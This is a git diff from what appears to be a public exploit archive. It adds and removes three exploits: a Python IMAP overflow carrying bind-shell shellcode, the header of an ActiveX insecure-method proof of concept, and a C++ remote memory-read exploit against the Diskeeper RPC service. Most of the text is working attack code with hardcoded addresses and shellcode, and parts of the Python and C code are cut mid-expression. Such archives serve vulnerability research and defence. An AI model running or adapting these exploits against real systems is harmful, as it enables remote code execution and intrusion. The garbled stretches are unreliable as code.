#2, call esp in kernel32. When hit, esp points at the next 4 bytes. - s = Copulate(target,143) - pkt = "0001 LOGIN \"" - pkt += u - pkt += "\" \"" - pkt += p - pkt += "\"\r\n" - SendPacket(s,pkt) - pkt = "0003 SELECT \"Inbox\"\r\n" - SendPacket(s,pkt) - pkt = "C284 SEARCH " - pkt += "P"*1008 - pkt += struct.pack(' ' % sys.argv[0] - sys.exit(-1) - Fascism(target,u,p) - -# milw0rm.com [2007-08-14] +#!/usr/bin/python + +import os +import sys +import time +import socket +import struct + +#this is imap exploit + +#710 bytes, tcp port 9999 bind, borrowed from skape miller inventor of megacanvas +sc = "\x90" +sc += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xeb\x03\x59" +sc += "\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49\x49\x49\x49" +sc += "\x49\x49\x49\x49\x49\x49\x49\x49\x51\x37\x5a\x6a\x66\x58\x50\x30" +sc += "\x41\x31\x42\x41\x6b\x41\x41\x76\x41\x32\x41\x41\x32\x42\x41\x30" +sc += "\x42\x41\x58\x50\x38\x41\x42\x75\x79\x79\x4b\x4c\x32\x4a\x7a\x4b" +sc += "\x42\x6d\x78\x68\x4c\x39\x4b\x4f\x4b\x4f\x4b\x4f\x75\x30\x6e\x6b" +sc += "\x42\x4c\x45\x74\x71\x34\x6c\x4b\x41\x55\x57\x4c\x4e\x6b\x33\x4c" +sc += "\x53\x35\x51\x68\x55\x51\x68\x6f\x4c\x4b\x72\x6f\x56\x78\x6e\x6b" +sc += "\x61\x4f\x77\x50\x76\x61\x38\x6b\x52\x69\x4e\x6b\x36\x54\x4e\x6b" +sc += "\x67\x71\x4a\x4e\x76\x51\x4f\x30\x6d\x49\x4e\x4c\x4d\x54\x4b\x70" +sc += "\x41\x64\x43\x37\x4b\x71\x6b\x7a\x76\x6d\x54\x41\x4f\x32\x7a\x4b" +sc += "\x6a\x54\x45\x6b\x33\x64\x56\x44\x77\x58\x34\x35\x6b\x55\x4c\x4b" +sc += "\x61\x4f\x46\x44\x55\x51\x58\x6b\x31\x76\x6c\x4b\x46\x6c\x30\x4b" +sc += "\x4e\x6b\x61\x4f\x75\x4c\x64\x41\x38\x6b\x53\x33\x54\x6c\x4c\x4b" +sc += "\x6d\x59\x50\x6c\x64\x64\x55\x4c\x30\x61\x6b\x73\x74\x71\x4b\x6b" +sc += "\x51\x74\x4c\x4b\x51\x53\x70\x30\x4c\x4b\x77\x30\x36\x6c\x4c\x4b" +sc += "\x72\x50\x35\x4c\x4e\x4d\x6c\x4b\x73\x70\x57\x78\x31\x4e\x42\x48" +sc += "\x4e\x6e\x50\x4e\x76\x6e\x5a\x4c\x30\x50\x6b\x4f\x49\x46\x75\x36" +sc += 
"\x56\x33\x53\x56\x75\x38\x37\x43\x34\x72\x35\x38\x74\x37\x54\x33" +sc += "\x44\x72\x63\x6f\x71\x44\x4b\x4f\x7a\x70\x42\x48\x38\x4b\x38\x6d" +sc += "\x6b\x4c\x47\x4b\x30\x50\x4b\x4f\x4e\x36\x51\x4f\x4f\x79\x4d\x35" +sc += "\x42\x46\x4b\x31\x7a\x4d\x33\x38\x57\x72\x76\x35\x61\x7a\x46\x62" +sc += "\x4b\x4f\x6e\x30\x51\x78\x4b\x69\x67\x79\x59\x65\x6c\x6d\x41\x47" +sc += "\x4b\x4f\x6e\x36\x41\x43\x56\x33\x76\x33\x52\x73\x70\x53\x51\x53" +sc += "\x70\x53\x32\x63\x32\x73\x6b\x4f\x4e\x30\x41\x76\x62\x48\x36\x47" +sc += "\x54\x4f\x41\x76\x72\x73\x4f\x79\x49\x71\x4e\x75\x31\x78\x6e\x44" +sc += "\x67\x6a\x64\x30\x4f\x37\x70\x57\x69\x6f\x6e\x36\x70\x6a\x74\x50" +sc += "\x62\x71\x73\x65\x4b\x4f\x38\x50\x62\x48\x4c\x64\x4e\x4d\x64\x6e" +sc += "\x58\x69\x62\x77\x4b\x4f\x7a\x76\x50\x53\x51\x45\x39\x6f\x58\x50" +sc += "\x71\x78\x6b\x55\x53\x79\x6f\x76\x53\x79\x36\x37\x39\x6f\x79\x46" +sc += "\x72\x70\x61\x44\x33\x64\x62\x75\x59\x6f\x48\x50\x4a\x33\x51\x78" +sc += "\x6d\x37\x71\x69\x79\x56\x71\x69\x70\x57\x6b\x4f\x6e\x36\x51\x45" +sc += "\x69\x6f\x6e\x30\x45\x36\x63\x5a\x41\x74\x35\x36\x72\x48\x30\x63" +sc += "\x50\x6d\x6f\x79\x59\x75\x63\x5a\x52\x70\x43\x69\x37\x59\x58\x4c" +sc += "\x4f\x79\x79\x77\x52\x4a\x33\x74\x4d\x59\x39\x72\x55\x61\x4f\x30" +sc += "\x7a\x53\x6d\x7a\x79\x6e\x47\x32\x76\x4d\x69\x6e\x47\x32\x34\x6c" +sc += "\x6d\x43\x6c\x4d\x72\x5a\x54\x78\x4e\x4b\x4c\x6b\x6c\x6b\x75\x38" +sc += "\x52\x52\x4b\x4e\x4e\x53\x55\x46\x79\x6f\x71\x65\x41\x54\x59\x6f" +sc += "\x4e\x36\x43\x6b\x71\x47\x51\x42\x52\x71\x62\x71\x52\x71\x51\x7a" +sc += "\x33\x31\x56\x31\x46\x31\x51\x45\x50\x51\x59\x6f\x4e\x30\x50\x68" +sc += "\x4c\x6d\x6e\x39\x53\x35\x6a\x6e\x62\x73\x49\x6f\x5a\x76\x50\x6a" +sc += "\x59\x6f\x4b\x4f\x34\x77\x59\x6f\x5a\x70\x6c\x4b\x32\x77\x39\x6c" +sc += "\x6c\x43\x4b\x74\x61\x74\x6b\x4f\x6a\x76\x50\x52\x79\x6f\x6e\x30" +sc += "\x42\x48\x7a\x4f\x6a\x6e\x59\x70\x63\x50\x42\x73\x4b\x4f\x48\x56" +sc += "\x79\x6f\x4e\x30\x66" + + +def Copulate(target,port): + s = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((target,port)) + return s + +def Fascism(target,u,p): + safe_readable_null = 0x71c010e4 # Safe readable, preferably null (ws2_32 on win2k3) + safe_writable = 0x0fff7004 # Safe writable (rsaenh.dll data section on win2k3) + pop_then_ret = 0x77e41a26 # EIP (pop, ret in kernel32 on win2k3) + call_esp = 0x77e839b3 # Return #2, call esp in kernel32. When hit, esp points at the next 4 bytes. + s = Copulate(target,143) + pkt = "0001 LOGIN \"" + pkt += u + pkt += "\" \"" + pkt += p + pkt += "\"\r\n" + SendPacket(s,pkt) + pkt = "0003 SELECT \"Inbox\"\r\n" + SendPacket(s,pkt) + pkt = "C284 SEARCH " + pkt += "P"*1008 + pkt += struct.pack(' ' % sys.argv[0] + sys.exit(-1) + Fascism(target,u,p) + +# milw0rm.com [2007-08-14] diff --git a/platforms/windows/remote/4290.html b/platforms/windows/remote/4290.html index c29f831c8..549d661b5 100755 --- a/platforms/windows/remote/4290.html +++ b/platforms/windows/remote/4290.html @@ -1,38 +1,38 @@ -
    ---------------------------------------------------------------------------------------------------------------
    - 0-day EDraw Office Viewer Component 5.1 (officeviewer.ocx v. 5.1.199.1) "HttpDownloadFile()" Insecure Method
    - url: http://www.ocxt.com/officeviewer.php
    -
    - author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    - 
    - This was written for educational purpose. Use it at your own risk.
    - Author will be not be responsible for any damage.
    - 
    - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    - all software that use this ocx are vulnerable to this exploits.
    -
    - This ActiveX is marked as:
    - RegKey Safe for Script: True
    - RegKey Safe for Init: True
    - Implements IObjectSafety: True
    - IDisp Safe: Safe for untrusted: caller, data
    - IPStorage Safe: Safe for untrusted: caller,data
    ---------------------------------------------------------------------------------------------------------------
    -
    -
    -
    -
    -
    -
    -
    -
    -
-# milw0rm.com [2007-08-16]
+
    +--------------------------------------------------------------------------------------------------------------
    + 0-day EDraw Office Viewer Component 5.1 (officeviewer.ocx v. 5.1.199.1) "HttpDownloadFile()" Insecure Method
    + url: http://www.ocxt.com/officeviewer.php
    +
    + author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    + 
    + This was written for educational purpose. Use it at your own risk.
    + Author will be not be responsible for any damage.
    + 
    + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    + all software that use this ocx are vulnerable to this exploits.
    +
    + This ActiveX is marked as:
    + RegKey Safe for Script: True
    + RegKey Safe for Init: True
    + Implements IObjectSafety: True
    + IDisp Safe: Safe for untrusted: caller, data
    + IPStorage Safe: Safe for untrusted: caller,data
    +--------------------------------------------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    +
+# milw0rm.com [2007-08-16]
diff --git a/platforms/windows/remote/4292.cpp
index 5f6b46ace..ceb6d7f40 100755
--- a/platforms/windows/remote/4292.cpp
+++ b/platforms/windows/remote/4292.cpp
@@ -1,511 +1,511 @@ -/* -Diskeeper Remote Memory Disclosure -Credit: Pravus (pravus -a-t- hush -d-o-t- com) -Greetz: Scientology for making a remotely accessible disk -defragmenter. Felix, Jenna, and Isaac. - -Vulnerability Description: -This vulnerability involves a memory comparison function that is -remotely, anonymously accessible via the remote procedure call in -the Diskeeper administrative interface. Using this, an attacker -can guess / brute force memory at any address in the process; -although passing a bad pointer will cause a memory read exception -and DoS the process. Since causing a Denial of Service for -Diskeeper is of minimal consequence, this write-up will focus on -the memory reading aspect. - -By making use of shared user memory at 0x7FFE0000, an attacker can -learn information, such as Windows drive, path, and version. More -importantly for a targeted attack, an attacker can also get the -name, path, version and base address of all loaded modules in the -process. This would essentially defeat address space randomization -(ASLR) in Windows Vista, since loaded modules tend to have the same -preferred address in all processes for each boot of the system. - -Details: -Diskeeper introduced their administrative interface in Diskeeper 9 -and continued it in Diskeeper 10 and Diskeeper 2007. For the -purpose of this vulnerability I tested in Diskeeper 9 Professional -and Diskeeper 2007 Pro Premier. (Though I believe from -documentation that the Server Editions of each and both versions in -Diskeeper 10 are equally vulnerable.) - -The administrative interface, DkService.exe, runs as a system -service that is by default configured to automatically start. It -listens on TCP port 31038 and has three RPC functions available. -Calling the opcode 0x01 RPC function (MIDL below) allows a remote, -anonymous memory comparison at an attacker provided address. -Simply pass the size of the data, the data, and the address to make -use of this. 
- -MIDL -/* opcode: 0x01, address: 0x004922F0 (address from 2007 -ProPremier)* / - -long sub_4922F0 ( - [in] long arg_1, - [in][size_is(arg_1)] char * arg_2, - [in] hyper arg_3 -); - - -Exploitation: -In order to exploit this, one must bind to the RPC interface, then -initiate the RPC call as many times as desired. If guessing an -intelligent value, such as a widecharacter string L"WINDOWS", -providing multiple bytes of data is optimal for speed's sake. If -attempting to brute force an address, doing so one byte at a time -is preferable so you are guessing at most 4n times instead of n^4. - -In my sample exploit, I am first getting general system information -by looking at fixed locations in shared user data. I get the -Windows drive letter, the Windows directory, and the Windows OS -version (5.1=XP; 6.0=Vista; etc.) Then I brute force an address in -NTDLL.DLL from the shared user data. From this, I can jump -backwards to the start of the module, looking for the MZ header. -Knowing where the start of the module is, I can look for the .data -header to find where the data section of NTDLL.DLL is loaded. - -This is where things get a little tricky. Since the loaded module -hash table is at different places in the data section depending on -the version of NTDLL.DLL, we have to search for it. Basically each -hash bucket that is empty contains a pointer to itself, so I made a -mask to place over memory that defined which buckets could be empty -vs. not, and defined that the last 6 had to be empty, because they -correspond to modules that don't start with an alphabetic character -in name. (This part could be made more effective and faster, but -for a PoC, it should work.) Once it finds memory that fits the -mask, I iterate the linked list at each of the 32 hash buckets and -read the relevant loaded module information. - -I just used a #define for the IP address string, so modify it for -your target IP. 
- -Exploit Code: - -*/ - -//Diskeeper Remote Memory Read -//By: Pravus -#define WIN32_LEAN_AND_MEAN -#define PORT 31038 -#define DELAY 50 -#define _CRT_SECURE_NO_DEPRECATE -#define _USE_32BIT_TIME_T -#define servername "127.0.0.1" - -#pragma comment (lib,"ws2_32") -#include -#include -#include -#include -#include -#include - -char rpcbind [] = -"\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00" -"\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00" -"\xb7\xf9\x09\x28\xef\xcf\x64\x41\x8c\x46\xe8\xd4\x17\x52\x2c\x1c" -"\x03\x00\x03\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00" -"\x2b\x10\x48\x60\x02\x00\x00\x00"; - -char request [] = -"\x05\x00\x00\x03\x10\x00\x00\x00\x68\x00\x00\x00\x00\x00\x00\x00" -"\x50\x00\x00\x00\x00\x00\x01\x00"; -//4 byte len -//4 byte len -//dword aligned string -//pointer -//ign dword - - -//This function is a simple remote comparison returning true if the memory -//at loc matches value for len bytes. This is where the real "exploitation" -//comes into play. We just send a mocked up RPC request using their provided -//remote mem compare function. 
-BOOL rmemcmp(SOCKET conn, int loc, char* value, int len) -{ - char buff [32768]; - int w,x=0; - memset(buff, '\0', sizeof(buff)); - memcpy(buff, request, sizeof(request)); - x+=sizeof(request)-1; - - memcpy(buff+x, &len, sizeof(len)); //len - x+=sizeof(len); - memcpy(buff+x, &len, sizeof(len)); //len - x+=sizeof(len); - memcpy(buff+x, value, len); //string - x+=len; - x+=(8-(len%8))%8; //null pad - memcpy(buff+x, &loc, sizeof(loc)); //pointer - x+=sizeof(loc); - w=0; - memcpy(buff+x, &w, sizeof(w)); //don't care - x+=sizeof(w); - - w=x-0x18; - memcpy(buff+8, &x, sizeof(x)); - memcpy(buff+0x10, &w, sizeof(w)); - - send(conn,(const char*)buff,x,0); - recv(conn,(char*)buff,2048,0); - - w=*(buff+0x18); - return (BOOL)w; -} - -//main function do all the calls -int main(int argc, char** argv) -{ - WSADATA wsaData; - if (WSAStartup(0x202,&wsaData)) - return 1; - - SOCKET conn; - conn=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); - if(conn==INVALID_SOCKET) - return 1; - - unsigned long addr; - addr=inet_addr(servername); - if (addr==INADDR_NONE) - { - closesocket(conn); - return 1; - } - - sockaddr_in server; - server.sin_addr.s_addr=addr; - server.sin_family=AF_INET; - server.sin_port=htons(PORT); - if(connect(conn,(struct sockaddr*)&server,sizeof(server))) - { - closesocket(conn); - return 1; - } - - linger ling; - ling.l_onoff=1; - ling.l_linger=0; - char buff [32768]; - char str [1024]; - WCHAR wstr [1024]; - unsigned char filechars [] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.\\"; - unsigned int listbin, mask; - unsigned char c, *d; - int u,v,w,x,y,z,ret,ntbase,ntdata,modbase; - struct _timeb timebuffer; - - timeval t; - t.tv_sec=0; - t.tv_usec=DELAY; - - //send the rpc bind - send(conn,(const char*)rpcbind,sizeof(rpcbind)-1,0); - recv(conn,(char*)buff,2048,0); - - //get the Windows drive letter - ret=0; - c='A'; - y=1; - z=0x7FFE0030; - while ((ret==0) && (c<='Z')) - { - sprintf(str, "%c", c); - ret=rmemcmp(conn, z, str, y); - - c++; - } - - if 
(!ret) - { - printf("Could not determine drive letter.\n"); - } - else - { - c--; - printf("Windows running on drive %c\n",c); - } - - //get the Windows dir - z=0x7FFE0036; - wcscpy(wstr, L"WINDOWS"); - y=wcslen(wstr)*2; - if (rmemcmp(conn, z, (char*)wstr, y)) - { - printf("Windows directory is WINDOWS\n"); - } - else - { - wcscpy(wstr, L"WINNT"); - y=wcslen(wstr)*2; - if (rmemcmp(conn, z, (char*)wstr, y)) - { - printf("Windows directory is WINNT\n"); - } - else - { - ret=0; - y=1; - z=0x7FFE0036; - printf("Windows directory is "); - do { - d=filechars; - ret=0; - while ((ret==0) && (*d)) - { - sprintf(str, "%c", *d); - ret=rmemcmp(conn, z, str, y); - - d++; - } - if (ret) - printf(str); - z+=2; - } while (ret==1); - printf("\n"); - } - } - - //Windows version - printf("Windows version is "); - - ret=0; - c='\x00'; - y=1; - z=0x7FFE026C; - while (ret==0) - { - sprintf(str, "%c", c); - ret=rmemcmp(conn, z, str, y); - - c++; - } - c--; - printf("%u.",c); - - ret=0; - c='\x00'; - y=1; - z+=4; - while (ret==0) - { - sprintf(str, "%c", c); - ret=rmemcmp(conn, z, str, y); - - c++; - } - c--; - printf("%u\n",c); - - //find the NTDLL.DLL base address - x=0; - y=1; - for (z=0x7FFE0303; z>=0x7FFE0300; z--) - { - ret=0; - c='\x00'; - while (ret==0) - { - sprintf(str, "%c", c); - ret=rmemcmp(conn, z, str, y); - - c++; - } - c--; - x=x<<8; - x+=c; - } // printf ("Beginning search for NTDLL.DLL at 0x%x\n",x); - - z=x&0xFFFF0000; - strcpy(str, "MZ"); - y=2; - ret=0; - while (ret==0) - { - ret=rmemcmp(conn, z, str, y); - z-=0x10000; - } - z+=0x10000; - ntbase=z; - printf ("NTDLL.DLL is based at 0x%x\n",z); - - //Look for .data section and then the module hash table in NTDLL (LDR_MODULE) - z+=0x160; //to skip over some of DOS header + PE header + .text section - - strcpy(str, ".data"); - y=5; - ret=0; - while (ret==0) - { - ret=rmemcmp(conn, z, str, y); - z+=4; - } - z+=8; //start of .data + 0x0c - y=1; - x=0; - for (w=z+3; w>=z; w--) - { - ret=0; - c='\x00'; - while (ret==0) - { - 
sprintf(str, "%c", c); - ret=rmemcmp(conn, w, str, y); - - c++; - } - c--; - x=x<<8; - x+=c; - } - z=ntdata=x+ntbase; - printf ("NTDLL data section located at 0x%x\n",z); - - //mask - 0=can't be empty hash, 1=can be empty; 01001101 11010000 10000101 11111111 - mask=0x4DD085FF; - listbin=0; - y=4; - do - { - ret=rmemcmp(conn, z, (char*)&z, y); - listbin=(listbin<<1)+ret; - ret=rmemcmp(conn, z+4, (char*)&z, y); - listbin=listbin&(~(!ret)); - - z+=8; - } while ((z>(31-((z-modbase)/8)))&1)==0) - { - v=z; - do { - x=0; - y=1; - for (w=v+3; w>=v; w--) - { - ret=0; - c='\x00'; - while (ret==0) - { - sprintf(str, "%c", c); - ret=rmemcmp(conn, w, str, y); - - c++; - } - c--; - x=x<<8; - x+=c; - } - - if (x==z) //if the next pointer points back to the module list, we're done - break; - - //get address of module name - v=x-12; - u=0; - y=1; - for (w=v+3; w>=v; w--) - { - ret=0; - c='\x00'; - while (ret==0) - { - sprintf(str, "%c", c); - ret=rmemcmp(conn, w, str, y); - - c++; - } - c--; - u=u<<8; - u+=c; - } - - //get the module name - ret=0; - y=1; - printf("Module "); - do { - d=filechars; - ret=0; - while ((ret==0) && (*d)) - { - sprintf(str, "%c", *d); - ret=rmemcmp(conn, u, str, y); - - d++; - } - if (ret) - printf(str); - u+=2; - } while (ret==1); - printf(" is loaded at "); - - //get the module address - v=x-36; - u=0; - y=1; - for (w=v+3; w>=v; w--) - { - ret=0; - c='\x00'; - while (ret==0) - { - sprintf(str, "%c", c); - ret=rmemcmp(conn, w, str, y); - - c++; - } - c--; - u=u<<8; - u+=c; - } - printf("0x%x\n",u); - - //get the module timestamp - v=x+8; - u=0; - y=1; - for (w=v+3; w>=v; w--) - { - ret=0; - c='\x00'; - while (ret==0) - { - sprintf(str, "%c", c); - ret=rmemcmp(conn, w, str, y); - - c++; - } - c--; - u=u<<8; - u+=c; - } - memset(str, '\0', sizeof(str)); - timebuffer.time=u; - ctime_s(str, 26, &(timebuffer.time)); - printf("Module time is %.24s (0x%x)\n", str, u); - - v=x; - } while (v!=z); - } - } - - system("pause"); - - WSACleanup(); - return 0; -} - -// 
milw0rm.com [2007-08-17] +/* +Diskeeper Remote Memory Disclosure +Credit: Pravus (pravus -a-t- hush -d-o-t- com) +Greetz: Scientology for making a remotely accessible disk +defragmenter. Felix, Jenna, and Isaac. + +Vulnerability Description: +This vulnerability involves a memory comparison function that is +remotely, anonymously accessible via the remote procedure call in +the Diskeeper administrative interface. Using this, an attacker +can guess / brute force memory at any address in the process; +although passing a bad pointer will cause a memory read exception +and DoS the process. Since causing a Denial of Service for +Diskeeper is of minimal consequence, this write-up will focus on +the memory reading aspect. + +By making use of shared user memory at 0x7FFE0000, an attacker can +learn information, such as Windows drive, path, and version. More +importantly for a targeted attack, an attacker can also get the +name, path, version and base address of all loaded modules in the +process. This would essentially defeat address space randomization +(ASLR) in Windows Vista, since loaded modules tend to have the same +preferred address in all processes for each boot of the system. + +Details: +Diskeeper introduced their administrative interface in Diskeeper 9 +and continued it in Diskeeper 10 and Diskeeper 2007. For the +purpose of this vulnerability I tested in Diskeeper 9 Professional +and Diskeeper 2007 Pro Premier. (Though I believe from +documentation that the Server Editions of each and both versions in +Diskeeper 10 are equally vulnerable.) + +The administrative interface, DkService.exe, runs as a system +service that is by default configured to automatically start. It +listens on TCP port 31038 and has three RPC functions available. +Calling the opcode 0x01 RPC function (MIDL below) allows a remote, +anonymous memory comparison at an attacker provided address. +Simply pass the size of the data, the data, and the address to make +use of this. 
+ +MIDL +/* opcode: 0x01, address: 0x004922F0 (address from 2007 +ProPremier)* / + +long sub_4922F0 ( + [in] long arg_1, + [in][size_is(arg_1)] char * arg_2, + [in] hyper arg_3 +); + + +Exploitation: +In order to exploit this, one must bind to the RPC interface, then +initiate the RPC call as many times as desired. If guessing an +intelligent value, such as a widecharacter string L"WINDOWS", +providing multiple bytes of data is optimal for speed's sake. If +attempting to brute force an address, doing so one byte at a time +is preferable so you are guessing at most 4n times instead of n^4. + +In my sample exploit, I am first getting general system information +by looking at fixed locations in shared user data. I get the +Windows drive letter, the Windows directory, and the Windows OS +version (5.1=XP; 6.0=Vista; etc.) Then I brute force an address in +NTDLL.DLL from the shared user data. From this, I can jump +backwards to the start of the module, looking for the MZ header. +Knowing where the start of the module is, I can look for the .data +header to find where the data section of NTDLL.DLL is loaded. + +This is where things get a little tricky. Since the loaded module +hash table is at different places in the data section depending on +the version of NTDLL.DLL, we have to search for it. Basically each +hash bucket that is empty contains a pointer to itself, so I made a +mask to place over memory that defined which buckets could be empty +vs. not, and defined that the last 6 had to be empty, because they +correspond to modules that don't start with an alphabetic character +in name. (This part could be made more effective and faster, but +for a PoC, it should work.) Once it finds memory that fits the +mask, I iterate the linked list at each of the 32 hash buckets and +read the relevant loaded module information. + +I just used a #define for the IP address string, so modify it for +your target IP. 
+ +Exploit Code: + +*/ + +//Diskeeper Remote Memory Read +//By: Pravus +#define WIN32_LEAN_AND_MEAN +#define PORT 31038 +#define DELAY 50 +#define _CRT_SECURE_NO_DEPRECATE +#define _USE_32BIT_TIME_T +#define servername "127.0.0.1" + +#pragma comment (lib,"ws2_32") +#include +#include +#include +#include +#include +#include + +char rpcbind [] = +"\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00" +"\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00" +"\xb7\xf9\x09\x28\xef\xcf\x64\x41\x8c\x46\xe8\xd4\x17\x52\x2c\x1c" +"\x03\x00\x03\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00" +"\x2b\x10\x48\x60\x02\x00\x00\x00"; + +char request [] = +"\x05\x00\x00\x03\x10\x00\x00\x00\x68\x00\x00\x00\x00\x00\x00\x00" +"\x50\x00\x00\x00\x00\x00\x01\x00"; +//4 byte len +//4 byte len +//dword aligned string +//pointer +//ign dword + + +//This function is a simple remote comparison returning true if the memory +//at loc matches value for len bytes. This is where the real "exploitation" +//comes into play. We just send a mocked up RPC request using their provided +//remote mem compare function. 
+BOOL rmemcmp(SOCKET conn, int loc, char* value, int len) +{ + char buff [32768]; + int w,x=0; + memset(buff, '\0', sizeof(buff)); + memcpy(buff, request, sizeof(request)); + x+=sizeof(request)-1; + + memcpy(buff+x, &len, sizeof(len)); //len + x+=sizeof(len); + memcpy(buff+x, &len, sizeof(len)); //len + x+=sizeof(len); + memcpy(buff+x, value, len); //string + x+=len; + x+=(8-(len%8))%8; //null pad + memcpy(buff+x, &loc, sizeof(loc)); //pointer + x+=sizeof(loc); + w=0; + memcpy(buff+x, &w, sizeof(w)); //don't care + x+=sizeof(w); + + w=x-0x18; + memcpy(buff+8, &x, sizeof(x)); + memcpy(buff+0x10, &w, sizeof(w)); + + send(conn,(const char*)buff,x,0); + recv(conn,(char*)buff,2048,0); + + w=*(buff+0x18); + return (BOOL)w; +} + +//main function do all the calls +int main(int argc, char** argv) +{ + WSADATA wsaData; + if (WSAStartup(0x202,&wsaData)) + return 1; + + SOCKET conn; + conn=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); + if(conn==INVALID_SOCKET) + return 1; + + unsigned long addr; + addr=inet_addr(servername); + if (addr==INADDR_NONE) + { + closesocket(conn); + return 1; + } + + sockaddr_in server; + server.sin_addr.s_addr=addr; + server.sin_family=AF_INET; + server.sin_port=htons(PORT); + if(connect(conn,(struct sockaddr*)&server,sizeof(server))) + { + closesocket(conn); + return 1; + } + + linger ling; + ling.l_onoff=1; + ling.l_linger=0; + char buff [32768]; + char str [1024]; + WCHAR wstr [1024]; + unsigned char filechars [] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.\\"; + unsigned int listbin, mask; + unsigned char c, *d; + int u,v,w,x,y,z,ret,ntbase,ntdata,modbase; + struct _timeb timebuffer; + + timeval t; + t.tv_sec=0; + t.tv_usec=DELAY; + + //send the rpc bind + send(conn,(const char*)rpcbind,sizeof(rpcbind)-1,0); + recv(conn,(char*)buff,2048,0); + + //get the Windows drive letter + ret=0; + c='A'; + y=1; + z=0x7FFE0030; + while ((ret==0) && (c<='Z')) + { + sprintf(str, "%c", c); + ret=rmemcmp(conn, z, str, y); + + c++; + } + + if 
(!ret) + { + printf("Could not determine drive letter.\n"); + } + else + { + c--; + printf("Windows running on drive %c\n",c); + } + + //get the Windows dir + z=0x7FFE0036; + wcscpy(wstr, L"WINDOWS"); + y=wcslen(wstr)*2; + if (rmemcmp(conn, z, (char*)wstr, y)) + { + printf("Windows directory is WINDOWS\n"); + } + else + { + wcscpy(wstr, L"WINNT"); + y=wcslen(wstr)*2; + if (rmemcmp(conn, z, (char*)wstr, y)) + { + printf("Windows directory is WINNT\n"); + } + else + { + ret=0; + y=1; + z=0x7FFE0036; + printf("Windows directory is "); + do { + d=filechars; + ret=0; + while ((ret==0) && (*d)) + { + sprintf(str, "%c", *d); + ret=rmemcmp(conn, z, str, y); + + d++; + } + if (ret) + printf(str); + z+=2; + } while (ret==1); + printf("\n"); + } + } + + //Windows version + printf("Windows version is "); + + ret=0; + c='\x00'; + y=1; + z=0x7FFE026C; + while (ret==0) + { + sprintf(str, "%c", c); + ret=rmemcmp(conn, z, str, y); + + c++; + } + c--; + printf("%u.",c); + + ret=0; + c='\x00'; + y=1; + z+=4; + while (ret==0) + { + sprintf(str, "%c", c); + ret=rmemcmp(conn, z, str, y); + + c++; + } + c--; + printf("%u\n",c); + + //find the NTDLL.DLL base address + x=0; + y=1; + for (z=0x7FFE0303; z>=0x7FFE0300; z--) + { + ret=0; + c='\x00'; + while (ret==0) + { + sprintf(str, "%c", c); + ret=rmemcmp(conn, z, str, y); + + c++; + } + c--; + x=x<<8; + x+=c; + } // printf ("Beginning search for NTDLL.DLL at 0x%x\n",x); + + z=x&0xFFFF0000; + strcpy(str, "MZ"); + y=2; + ret=0; + while (ret==0) + { + ret=rmemcmp(conn, z, str, y); + z-=0x10000; + } + z+=0x10000; + ntbase=z; + printf ("NTDLL.DLL is based at 0x%x\n",z); + + //Look for .data section and then the module hash table in NTDLL (LDR_MODULE) + z+=0x160; //to skip over some of DOS header + PE header + .text section + + strcpy(str, ".data"); + y=5; + ret=0; + while (ret==0) + { + ret=rmemcmp(conn, z, str, y); + z+=4; + } + z+=8; //start of .data + 0x0c + y=1; + x=0; + for (w=z+3; w>=z; w--) + { + ret=0; + c='\x00'; + while (ret==0) + { + 
sprintf(str, "%c", c); + ret=rmemcmp(conn, w, str, y); + + c++; + } + c--; + x=x<<8; + x+=c; + } + z=ntdata=x+ntbase; + printf ("NTDLL data section located at 0x%x\n",z); + + //mask - 0=can't be empty hash, 1=can be empty; 01001101 11010000 10000101 11111111 + mask=0x4DD085FF; + listbin=0; + y=4; + do + { + ret=rmemcmp(conn, z, (char*)&z, y); + listbin=(listbin<<1)+ret; + ret=rmemcmp(conn, z+4, (char*)&z, y); + listbin=listbin&(~(!ret)); + + z+=8; + } while ((z>(31-((z-modbase)/8)))&1)==0) + { + v=z; + do { + x=0; + y=1; + for (w=v+3; w>=v; w--) + { + ret=0; + c='\x00'; + while (ret==0) + { + sprintf(str, "%c", c); + ret=rmemcmp(conn, w, str, y); + + c++; + } + c--; + x=x<<8; + x+=c; + } + + if (x==z) //if the next pointer points back to the module list, we're done + break; + + //get address of module name + v=x-12; + u=0; + y=1; + for (w=v+3; w>=v; w--) + { + ret=0; + c='\x00'; + while (ret==0) + { + sprintf(str, "%c", c); + ret=rmemcmp(conn, w, str, y); + + c++; + } + c--; + u=u<<8; + u+=c; + } + + //get the module name + ret=0; + y=1; + printf("Module "); + do { + d=filechars; + ret=0; + while ((ret==0) && (*d)) + { + sprintf(str, "%c", *d); + ret=rmemcmp(conn, u, str, y); + + d++; + } + if (ret) + printf(str); + u+=2; + } while (ret==1); + printf(" is loaded at "); + + //get the module address + v=x-36; + u=0; + y=1; + for (w=v+3; w>=v; w--) + { + ret=0; + c='\x00'; + while (ret==0) + { + sprintf(str, "%c", c); + ret=rmemcmp(conn, w, str, y); + + c++; + } + c--; + u=u<<8; + u+=c; + } + printf("0x%x\n",u); + + //get the module timestamp + v=x+8; + u=0; + y=1; + for (w=v+3; w>=v; w--) + { + ret=0; + c='\x00'; + while (ret==0) + { + sprintf(str, "%c", c); + ret=rmemcmp(conn, w, str, y); + + c++; + } + c--; + u=u<<8; + 